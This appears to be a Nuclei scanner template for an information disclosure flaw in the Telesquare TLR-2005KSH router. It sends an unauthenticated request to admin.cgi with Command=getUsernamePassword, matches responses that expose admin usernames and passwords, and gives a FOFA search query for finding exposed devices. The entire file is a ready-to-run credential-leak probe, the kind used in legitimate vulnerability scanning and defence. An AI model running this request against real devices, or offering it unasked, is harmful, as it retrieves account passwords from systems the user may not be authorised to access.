telesquare-tlr2005-information-leakage

Nuclei templates:

id: telesquare-tlr2005-information-leakage
info:
  name: telesquare-tlr2005-information-leakage
  author: martian
  severity: medium
  description: |
    Information Disclosure Vulnerability in telesquare tlr2005 System to Access Account Passwords
  metadata:
    verified: true
    fofa-query: title="TLR-2005KSH" || banner="TLR-2005KSH login:"
  tags: leak,TLR-2005KSH,telesquare
requests:
  - raw:
      - |
        GET /cgi-bin/admin.cgi?Command=getUsernamePassword HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "password"
          - "username"
          - "admin_username"
          - "admin_password"
        condition: and
          
      - type: status
        status:
          - 200